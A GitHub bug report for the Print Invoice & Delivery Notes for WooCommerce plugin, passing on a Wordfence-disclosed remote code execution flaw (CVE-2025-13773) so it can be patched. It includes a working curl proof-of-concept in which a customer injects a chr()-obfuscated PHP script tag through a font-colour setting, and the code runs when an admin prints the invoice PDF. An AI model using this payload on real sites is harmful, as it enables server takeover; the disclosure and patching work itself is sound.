Skip to content

Vulnerability reported by Wordfence #470

New issue
New issue
Open
Bug
Open
Vulnerability reported by Wordfence#470
Bug
Assignees
gaminikhil
Labels
client issuetype: bug
Milestone
Future Milestone
@anjtha-21

Description

@anjtha-21
anjtha-21
opened on Dec 3, 2025

Prerequisites

  • I have carried out troubleshooting steps and I believe I have found a bug.
  • I have searched for similar bugs in both open and closed issues and cannot find a duplicate.

Describe the bug

A critical security vulnerability (CVE-2025-13773) has been responsibly disclosed by Wordfence researchers shark3y and Marcin Dudek (dudekmar).
The issue affects Print Invoice & Delivery Notes for WooCommerce ≤ 5.8.0 and allows unauthenticated remote code execution under certain conditions.

Steps to reproduce

  1. Install WooCommerce and the Print Invoice & Delivery Notes for WooCommerce plugin
  2. Create a customer account and place an order
  3. Obtain the customer's wordpress_logged_in_* cookie (e.g., from browser DevTools)
  4. As the customer, send the following request to inject the RCE payload:
curl -s -X POST 'https://target/wp-admin/admin-ajax.php' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Cookie: wordpress_logged_in_XXXX=CUSTOMER_COOKIE_VALUE' \
--data-urlencode 'action=heartbeat' \
--data-urlencode 'wcdn_general[template]=simple' \
--data-urlencode 'wcdn_invoice[status][]=customer_invoice' \
--data-urlencode 'invoice[document_setting][active]=1' \
--data-urlencode 'invoice[document_setting][document_setting_font_size]=14' \
--data-urlencode 'invoice[document_setting][document_setting_text_align]=left' \
--data-urlencode 'invoice[document_setting][document_setting_text_colour]=red"></h1></div><script type=text/php>file_put_contents(ABSPATH.chr(114).chr(99).chr(101).chr(46).chr(116).chr(120).chr(116),php_uname());</script><div><h1 style="color:blue'
  1. Trigger PDF generation by one of the following methods:
  • As an administrator, go to WooCommerce → Orders → select the order → click "Print Invoice"
  • Configure the plugin to attach PDF invoices to order emails, then trigger an order status change email
  1. Verify RCE by visiting [https://TARGET/rce.txt](https://target/rce.txt%60) — it will display the server's php_uname() output (kernel version, architecture, etc.)

Note: The payload uses chr() concatenation to avoid quote escaping issues with WordPress's input sanitization. The payload writes the output of php_uname() to a file in the webroot as proof of code execution.

Expected behavior

We need to review this vulnerability and apply the necessary patch to secure the plugin.

WordPress Environment

Isolating the problem

  • I have deactivated other plugins and confirmed this bug occurs when only our plugin is active.
  • This bug happens with a default WordPress theme active, or Storefront.
  • I can reproduce this bug consistently using the steps above.

Additional field

https://support.tychesoftwares.com/conversation/14085?folder_id=63

Metadata

Metadata

Assignees

Labels

client issuetype: bug

Type

Bug

Projects

No projects

Milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions